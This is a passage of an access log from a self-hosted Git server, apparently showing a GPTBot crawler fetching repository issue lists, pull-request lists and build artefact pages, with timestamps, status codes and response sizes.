+0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10012] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:28:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9982] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&sort=nearduedate&state=all&type=all" +[17/Feb/2026:19:28:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10185] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:28:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10209] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:19:28:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10217] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&sort=leastupdate&state=closed&type=all" +[17/Feb/2026:19:28:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10228] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&state=closed&type=all" +[17/Feb/2026:19:28:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10230] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&state=closed&type=all" +[17/Feb/2026:19:28:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10214] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&project=-1&sort=leastupdate&state=closed&type=all" +[17/Feb/2026:19:28:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10212] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&sort=nearduedate&state=all&type=all" +[17/Feb/2026:19:28:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10226] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:19:28:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make?display=rendered" [Client 74.7.227.38] [Length 11302] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" +[17/Feb/2026:19:28:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10233] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:28:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10012] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:28:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10170] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:28:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10145] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:28:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10025] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&project=-1&state=closed&type=all" +[17/Feb/2026:19:28:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10016] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&milestone=-1&state=open&type=all" +[17/Feb/2026:19:28:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10195] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&project=-1&state=open&type=all" +[17/Feb/2026:19:28:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10019] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:28:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10012] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&milestone=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:28:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10012] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&milestone=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:28:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10049] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:28:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10230] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:28:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 9993] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:28:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9973] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:28:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10166] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:29:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10163] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:29:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10183] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?project=-1&sort=farduedate&state=all&type=all" +[17/Feb/2026:19:29:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10086] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:19:29:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10048] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:29:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10043] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:29:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10187] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:29:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10183] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=latest&state=closed&type=all" +[17/Feb/2026:19:29:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?state=closed&type=all" [Client 74.7.227.38] [Length 10109] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues" +[17/Feb/2026:19:29:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10210] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&state=open&type=all" +[17/Feb/2026:19:29:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10051] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:29:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10055] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:29:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/Makefile2?display=source" [Client 74.7.227.38] [Length 14950] [Gzip 4.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/Makefile2" +[17/Feb/2026:19:29:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10183] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&project=-1&state=all&type=all" +[17/Feb/2026:19:29:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10195] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:29:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10183] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?project=-1&sort=farduedate&state=all&type=all" +[17/Feb/2026:19:29:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/pip3?display=source" [Client 74.7.227.38] [Length 11794] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/pip3" +[17/Feb/2026:19:29:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10243] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:29:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10155] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=leastupdate&state=all&type=all" +[17/Feb/2026:19:29:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10152] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=nearduedate&state=all&type=all" +[17/Feb/2026:19:29:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 9995] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=leastupdate&state=all&type=all" +[17/Feb/2026:19:29:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 9989] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=leastupdate&state=all&type=all" +[17/Feb/2026:19:29:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out?display=rendered" [Client 74.7.227.38] [Length 11070] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:19:29:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out?display=rendered" [Client 74.7.227.38] [Length 11073] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:19:29:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out?display=rendered" [Client 74.7.227.38] [Length 11072] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:19:29:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/PYZ-00.toc?display=rendered" [Client 74.7.227.38] [Length 11180] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/PYZ-00.toc" +[17/Feb/2026:19:29:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/EXE-00.toc?display=rendered" [Client 74.7.227.38] [Length 11181] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/EXE-00.toc" +[17/Feb/2026:19:29:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/PKG-00.toc?display=rendered" [Client 74.7.227.38] [Length 11179] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/PKG-00.toc" +[17/Feb/2026:19:29:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&project=-1&sort=oldest&state=open&type=all" +[17/Feb/2026:19:29:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10027] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:29:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10046] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:29:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10230] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:29:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10055] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:29:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10054] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 